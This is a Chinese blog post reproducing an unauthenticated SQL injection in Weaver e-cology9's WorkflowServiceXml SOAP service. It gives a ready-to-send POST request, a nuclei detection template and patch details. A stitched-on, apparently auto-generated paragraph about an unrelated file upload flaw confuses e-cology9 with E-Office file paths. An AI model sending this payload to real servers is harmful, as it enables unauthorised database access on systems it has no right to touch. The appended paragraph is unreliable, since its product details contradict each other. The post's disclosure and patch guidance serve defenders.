【漏洞复现】泛微e-cology9 WorkflowServiceXml SQL注入漏洞

前言

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。

漏洞名称泛微e-cology9 WorkflowServiceXml SQL注入漏洞
公开时间2024-07-10
威胁类型命令执行

漏洞描述

在默认配置下,未授权攻击者可利用该漏洞执行任意SQL语句,从而造成任意命令执行。

影响范围

泛微e-cology9 < 10.64.1

漏洞复现

POST /services/WorkflowServiceXml HTTP/1.1
Host: x.x.x.x
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver">
  <soapenv:Header/>
  <soapenv:Body>
    <web:getHendledWorkflowRequestList>
      <web:in0>1</web:in0>
      <web:in1>1</web:in1>
      <web:in2>1</web:in2>
      <web:in3>1</web:in3>
      <web:in4>
        <web:string>1=1</web:string>
      </web:in4>
    </web:getHendledWorkflowRequestList>
  </soapenv:Body>
</soapenv:Envelope>

在这里插入图片描述

nuclei脚本

id: 泛微e-cology9 WorkflowServiceXml SQL注入漏洞

info:
  name: 泛微e-cology9 WorkflowServiceXml SQL注入漏洞
  author: whgojp
  severity: info
  description: 在默认配置下,未授权攻击者可利用该漏洞执行任意SQL语句,从而造成任意命令执行

http:
  - raw:
      - |
        POST /services/WorkflowServiceXml HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml;charset=UTF-8

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver">
          <soapenv:Header/>
          <soapenv:Body>
            <web:getHendledWorkflowRequestList>
              <web:in0>1</web:in0>
              <web:in1>1</web:in1>
              <web:in2>1</web:in2>
              <web:in3>1</web:in3>
              <web:in4>
                <web:string>1=1</web:string>
              </web:in4>
            </web:getHendledWorkflowRequestList>
          </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "getHendledWorkflowRequestListResponse"

安全修复

目前官方已发布安全补丁,建议受影响用户升级至最新版本:

泛微e-cology 9 >= 10.64.1

官方补丁下载地址:

https://www.weaver.com.cn/cs/securityDownload.html

我的博客即将同步至腾讯云开发者社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?invite_code=2g93y2r9ge1w0

泛微e-cology前台文件上传漏洞是指在泛微e-cology系统的前台功能中存在漏洞,攻击者可以利用该漏洞上传恶意文件到服务器上。根据引用\[1\]中提到的CNVD-2020-33199漏洞编号,该漏洞可能存在于泛微e-cology9版本的前台文件上传功能中。具体触发点位于文件/global_search.php的第108行,调用了doc2text()函数,并追溯到doc2txt()函数中的$FILE_PATH参数的源代码。该参数连接了附件目录(C:\eoffice9\webroot\ATTACHMENT)的数据表FLE_CONTENT中ATTACHMENT_ID和ATTACHMENT_NAME列的值,以获取完整的文件路径。\[2\] 需要注意的是,根据引用\[3\]中的声明,本文提供的信息仅供网络安全人员参考,未经授权请勿利用文章中的技术资料进行任何入侵操作。同时,禁止将本文提供的工具用于其他目的。 #### 引用[.reference_title] - *1* [泛微e-cology9前台文件上传漏洞复现](https://blog.csdn.net/qq_41490561/article/details/116119845)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [泛微E-Office前台文件上传漏洞](https://blog.csdn.net/u010025272/article/details/131312528)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值